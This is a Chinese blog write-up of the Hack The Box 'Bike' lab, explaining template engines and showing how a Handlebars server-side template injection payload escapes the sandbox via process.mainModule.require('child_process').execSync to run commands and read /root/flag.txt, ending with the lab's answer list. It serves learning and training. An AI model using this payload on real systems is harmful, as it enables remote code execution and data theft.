HTB_Bike靶机之模板注入

已于 2023-02-08 13:36:26 修改
阅读量504 收藏 3
点赞数 3
分类专栏: # startpoint 文章标签: 安全
于 2022-05-12 07:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/124721021
版权

船到桥头自然直

文章目录

信息收集

日常 A 扫描,两个端口

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Node.js (Express middleware)
|_http-title:  Bike

访问 22 端口直接拒绝了我们的连接,访问 80 端口,只有一个输入框,让我们输入邮箱,随便输入,提交,会返回输入信息

在这里插入图片描述

可以尝试测试 XSS,但是一般的利用都是钓鱼或者点击交互窃取信息,根据返回的代码可以发现对特殊符号进行了 html实体编码 ,我们在 pikachu 靶场中接触过实体编码,当时是通过 <img> 标签的 onerror 属性触发经过编码的 js 语句,这里暂时不会别的绕过方式

在这里插入图片描述

使用的组件,express 是一个基于 node.js 的 web 框架

在这里插入图片描述

又查看了源码,没发现什么特殊的地方,有什么思路呢?

本次使用模板注入进行测试

模板引擎

模板引擎是将数据变为视图的最优雅的解决方案

比如我有一组数据 data 要编写对应的 html,正常写 html 可以通过 li 标签包裹 div 标签再嵌套三个 p 标签的方式显示数据

[
    {"name":"小明","age":"12","sex":"男"},
    {"name":"小红","age":"11","sex":"女"},
    {"name":"小强","age":"13","sex":"男"}
]

通过模板 template 引擎(这里以mustache为例) 能快速生成对应的 html{{#arr}} 代表使用对应的数组进行循环,通过双花括号引用数据

<ul>
    {{#arr}}
        <li>
            <div class="hd">{{name}}的基本信息</div>
            <div class="bd">
                <p>姓名:{{name}}</p>
                <p>性别:{{sex}}</p>
                <p>年龄:{{age}}</p>
            </div>
        </li>
    {{/arr}}
</ul>

通过 Mustache.render(templateStr,data) 注入数据渲染后就可以生成对应的 html ,很方便

<ul>
    <li>
        <div class="hd">小明的基本信息</div>
        <div class="bd">
            <p>姓名:小明</p>
            <p>性别:男</p>
            <p>年龄:12</p>
        </div>
    </li>
    <li>
        <div class="hd">小红的基本信息</div>
        <div class="bd">
            <p>姓名:小红</p>
            <p>性别:女</p>
            <p>年龄:11</p>
        </div>
    </li>
    <li>
        <div class="hd">小强的基本信息</div>
        <div class="bd">
            <p>姓名:小强</p>
            <p>性别:男</p>
            <p>年龄:13</p>
        </div>
    </li>
</ul>

SSIT 模板注入

如何识别后端使用了什么模板引擎呢? 可以使用一些常见的语句测试

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

在这里插入图片描述

如果符合该引擎的语法,则语句会被执行或者引发报错

尝试一下,第一个就报错了,这也是比较常见的一种写法 {{}}

在这里插入图片描述

handlebars 模板引擎是比较常用的一种,中文文档 👉Handlebars中文文档

经典的 payload 如下,通过 exec('whoami') 执行系统命令

{{#with "s" as |string|}}
 {{#with "e"}}
   {{#with split as |conslist|}}
     {{this.pop}}
     {{this.push (lookup string.sub "constructor")}}
     {{this.pop}}
     {{#with string.split as |codelist|}}
       {{this.pop}}
       {{this.push "return require('child_process').exec('whoami');"}}
       {{this.pop}}
       {{#each conslist}}
         {{#with (string.sub.apply 0 codelist)}}
           {{this}}
         {{/with}}
       {{/each}}
     {{/with}}
   {{/with}}
 {{/with}}
{{/with}}

{{#with aaaaaa}}                 // 定位到 aaaaaa 一般是某个数据对象里的
{{#with aaaaaa as |b|}}          // 类似别名,可以通过 b.属性名调用 aaaaaa的属性
{{#with "person"}}               // 一个字符串对象 就是它本身 this 指向字符串 person
{{#with "s" as |string|}}        // {{string}} -> s
{{#each conslist}}               // each 是遍历数组对象

这个 payload 我说实话我自己是根本写不出来的,即使看了手册也不懂,卡了很久,我突然觉得很多问题是属于船到桥头自然直的东西,没必要死抠,后面学到新知识自然会懂,所谓温故而知新,不急于一时

回到这个问题,pushpop 是向数组里添加删除数据,大致就是将命令执行的结果添加到数组中输出 {{this.push "return require('child_process').exec('whoami');"}},但是,测试的时候报错 require is not defined

在这里插入图片描述

因为模板引擎通常是在沙箱环境中运行(隔离环境),所以很难加载运行系统命令的模块,而上面的代码是试图将 child_process 模块加载到内存进而执行系统命令

node.js 是一种单线程的模型,使用的是全局 process 模块,所有的任务都在一个线程中进行,node提供了child process 模块来创建子进程,从而实现多线程并行计算

我们可以尝试调用全局 process 模块,且不需使用 require 关键字,{{this.push "return process"}} ,成功返回

在这里插入图片描述

返回如下,一共 6 个 this 语句,每个返回一个结果,push 语句返回数组长度,pop 删除并返回数组最后一个元素,可以自行添加 pushpop 语句尝试

e
2
[object Object]
function Function() { [native code] }
2
[object Object]
[object process]

process 有一个 mainMoudle 模块,虽然已经弃用,但是并不代表不能访问,通过它可以检索 require.main 主模块,主模块一般不会在沙箱环境中,所以也可以尝试使用 require

在这里插入图片描述

我们通过 mainMoudle 模块来调用 child_process 模块,因为 node 一般就是通过 child_process 模块来执行系统命令的,新构造的命令如下

{{this.push "return process.mainModule.require('child_process');"}}

这次就可以正常返回了

在这里插入图片描述

然后回到最开始的执行命令并返沪结果,但是使用 exec 并没有返回具体结果,而是返回 [Object Object] ,使用 execSync 才正常返回了 root

{{this.push "return
process.mainModule.require('child_process').execSync('whoami');"}}

那么接下来的流程就是看文件找 flag

 {{this.push "return
process.mainModule.require('child_process').execSync('ls');"}}

最后在系统目录 root 下找到了 flag.txt 文件,

{{#with "s" as |string|}}
 {{#with "e"}}
 {{#with split as |conslist|}}
 {{this.pop}}
 {{this.push (lookup string.sub "constructor")}}
 {{this.pop}}
 {{#with string.split as |codelist|}}
 {{this.pop}}
 {{this.push "return
process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
 {{this.pop}}
 {{#each conslist}}
 {{#with (string.sub.apply 0 codelist)}}
 {{this}}
 {{/with}}
 {{/each}}
 {{/with}}
 {{/with}}
 {{/with}}
{{/with}}

在这里插入图片描述

后放答案

22,80
Node.js
Express
Server Side Template Injection
Handlebars
Decoder
URL
require
global
root
重返太空
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
Ubuntu安装ssh开启22端口并设置允许root远程登录
最新发布
奇点的博客
10-26 3361
将 PermitRootLogin 改为 yes。
模板注入学习
qq_44111753的博客
02-03 2370
模板引擎:是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。 模板渲染:拿到数据,塞到模板里,然后让渲染引擎将塞进去的东西生成 html 的文本,返回给浏览器 好处:展示数据快,大大提升效率。 后端渲染:服务器计算好最终的html字符串发送给用户,即浏览器只需要进行html解析以及通过操作系统提供的操纵显示器显示内容的系统调用在显示器上把HTML所代表的图像显示给用户。 好处:模板统一在后盾,前端(相对)省事,不占用客户端运算资
SSTI服务器模板注入漏洞
山兔的博客
11-11 1500
该靶场重点利用 Node.js 中的模板引擎 Handlebars 中识别的服务器端模板注入漏洞。本演练将演示当开发人员未正确清理用户输入时,如何在 Web 服务器中利用 SSTI。我们还将介绍 Node.js、模板引擎和全局变量的基础知识,以及如何使用可用的受限 Javascript 命令逃离沙盒环境。
靶机渗透练习22-FunBox1
hirak0的博客
04-18 1536
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-1,518/ Description Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtua
Ubuntu允许ssh远程登录(开通22端口)
lalifeier的博客
07-08 8588
1.查看IP地址 ip addr 2.查看22 端口 netstat -ntlp|grep 22 3.开启22端口 apt-get install openssh-server ufw enable ufw allow 22/tcp
ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入
YouthBelief的博客
03-04 788
ctf系列-bugku靶场 web记录Simple_SSTI_1 模板注入SSTI_2 Simple_SSTI_1 模板注入 (1)启动环境 (2)抓包访问链接 发现响应包 显示为python服务 源码 提示 你需要传入一个flag的参数 你知道,在这套flask框架中,我们经常设置一个secret_key 变量 (3)测试flag参数 http://114.67.175.224:17072/?flag={{2*2}} (4)根据提示获取SECRET_KEY变量 http://114.67.175
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
handlebars模板引擎使用初探1
u012443286的博客
10-13 1718
谈到handlebars,我们不禁产生疑问,为什么要使用这样的一个工具呢?它究竟能为我们带来什么样的好处?如何使用它呢? 一、handlebars可以干什么? 首先,我们来看一个案例: 有这样的html结构: &lt;div class="demo"&gt; &lt;h1&gt;name&lt;/h1&gt; &l...
前端模板引擎Handlebars的使用总结(一)
菜菜的博客
12-22 2140
模板引擎,就是在定义好的模板上面填充与其对应的数据生成静态的html页面,即: 模板 + 数据 =====&gt; html页面 模板引擎的作用是抽象公共页面来重用,并且达到【视图(包括展示渲染逻辑)与程序逻辑的分离】(mvvc,mvc等开发模式思想) 目前用过的类似模板引擎有JSP、freemarker,这两种都属于java范畴的,服务端解析。而作为...
服务器端模板注入
Eason_LYC安全白帽子的成长博客
05-17 1093
服务器端模板注入,是一类注入难度底,但是需要知识面广的一种漏洞。
openssh升级处理
zphj1987的博客
10-20 1431
需求 升级openssh的包,因为有漏洞的爆出,需要更新openssh的版本 处理 系统自带的版本 openssh-client_7.2p2 我们使用这个版本的打包的debian文件,下载地址 wget https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/openssh/1:7.2p2-4/openssh_7.2p2-4.debian.tar.xz 下载8.4的源码 wget http://archive.ubuntu.com/ubunt
handlebars用法
diaobuwei1238的博客
06-17 461
为什么需要模板引擎 关于前端的模板引擎,我用一个公式来解释 模板引擎 模板 + 数据 ========> html页面 模板引擎就像是html的解析生成器,将对应的模板填充完数据之后生成静态的html页面。它可以在浏览器端(比如angular中指令所用的模板)也可以在服务器端执行,不过一般用于服务器端。因为它的一个作用是抽象公共页面来重用,如果在服...
node.js中Express模板
qq_44216701的博客
07-19 1238
什么是Express Express 是一个简洁而灵活的 node.js Web应用框架, 提供了一系列强大特性帮助你创建各种 Web 应用,和丰富的 HTTP 工具。 使用 Express 可以快速地搭建一个完整功能的网站。 Express 框架核心特性: 可以设置中间件来响应 HTTP 请求。 定义了路由表用于执行不同的 HTTP 请求动作。 可以通过向模板传递参数来动态渲染 HTML 页面。 安装Express 模板和其他的模板一样 cnpm install express --save 和Ex
模板注入总结(SSTI)
qq_44657899的博客
02-14 4863
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
NodeJs Express MySQL 实现用户简单注入
zhouzhiwengang的专栏
03-29 772
第一步:使用express 创建student 应用 express student # 创建student 应用 第二步:student 应用依赖第三方功能模块(mysql 和 body-parser) mysql :mysql 数据库连接 body-parser:解析post请求的参数 本地安装第三方模块(mysql 和 body-parser) cnpm install mys...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值